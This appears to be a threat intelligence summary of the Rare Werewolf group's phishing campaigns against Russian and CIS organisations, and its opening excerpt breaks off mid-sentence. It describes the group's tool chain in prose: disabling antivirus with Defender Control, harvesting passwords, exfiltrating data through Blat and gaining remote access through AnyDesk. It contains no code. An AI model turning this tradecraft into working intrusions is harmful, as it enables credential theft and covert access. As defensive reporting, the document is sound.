Full Report
The threat actor known as Rare Werewolf (formerly Rare Wolf) has been linked to a series of cyber attacks targeting Russia and the Commonwealth of Independent States (CIS) countries. "A distinctive feature of this threat is that the attackers favor using legitimate third-party software over developing their own malicious binaries," Kaspersky said. "The malicious functionality of the campaign
Analysis Summary
# Threat Actor: Rare Werewolf (formerly Rare Wolf)
## Attribution & Identity
Rare Werewolf, also tracked as **Librarian Ghouls** and **Rezet**. Believed to be active since at least 2019. Associated with a track record of striking organizations in Russia and Ukraine.
## Activity Summary
The threat actor is linked to cyber attacks targeting Russia and Commonwealth of Independent States (CIS) countries, impacting hundreds of Russian users. The recent documented activity involves using phishing emails containing password-protected archives with executable files. The goal is to establish remote access, siphon credentials, and deploy a cryptocurrency miner (XMRig). The campaign leverages legitimate third-party software rather than custom malware for malicious functionality, achieved via command files and PowerShell scripts.
## Tactics, Techniques & Procedures
- **Initial Access:** Phishing emails delivering password-protected archives containing executable files.
- **Execution:** Utilizing command files and PowerShell scripts for executing the malicious functionality.
- **Defense Evasion:** Deployment of Defender Control to disable antivirus software.
- **Discovery/Collection:** Harvesting Telegram messenger data and system passwords using tools like WebBrowserPassView.
- **Command and Control:** Use of AnyDesk remote desktop software and the legitimate utility Blat (SMTP tool) to exfiltrate stolen data to attacker-controlled email addresses.
- **Persistence/Automation:** A salient aspect involves a batch script launching a PowerShell script that automatically wakes up the victim system at 1 a.m. local time for a four-hour window to allow remote access via AnyDesk.
- **Resource Development (Masquerading):** Using legitimate software like 4t Tray Minimizer to obscure presence by minimizing running applications to the system tray.
## Targeting
- **Sectors:** Industrial enterprises and engineering schools.
- **Geography:** Russia (primary target), Belarus, and Kazakhstan (smaller number of infections).
- **Victims:** Hundreds of Russian users/organizations targeted.
## Tools & Infrastructure
- **Malware families used:** XMRig (Cryptocurrency Miner).
- **Legitimate Utilities Used Maliciously:** 4t Tray Minimizer, Defender Control, WebBrowserPassView, Mipko Employee Monitor, Blat (for data exfiltration).
- **Remote Access:** AnyDesk.
- **Infrastructure (C2, domains, IPs):** Mention of fetching additional files from a remote server; no specific URLs or IPs were defanged in the provided text.
## Implications
Rare Werewolf poses a significant threat due to its heavy reliance on legitimate, often whitelisted, software (Living Off The Land methods). This technique allows them to conduct widespread compromise, credential theft, and resource hijacking (cryptomining) while blending in with normal system activity, making detection via traditional signature-based methods difficult.
## Mitigations
- Enhancing detection capabilities to monitor for the launch and use of legitimate software (e.g., 4t Tray Minimizer, AnyDesk, Blat utility) in suspicious sequences, especially when paired with PowerShell for system control.
- Implementing strong controls around PowerShell execution and script block logging to detect the malicious scripts being used for system manipulation and remote access scheduling.
- Scrutinizing incoming email attachments, especially password-protected archives, originating from untrusted sources.
- Monitoring for indicators of cryptocurrency mining activity (high CPU/GPU usage inconsistent with typical workload).
- Auditing network traffic for connections related to legitimate remote access tools (like AnyDesk) used outside of established internal IT procedures.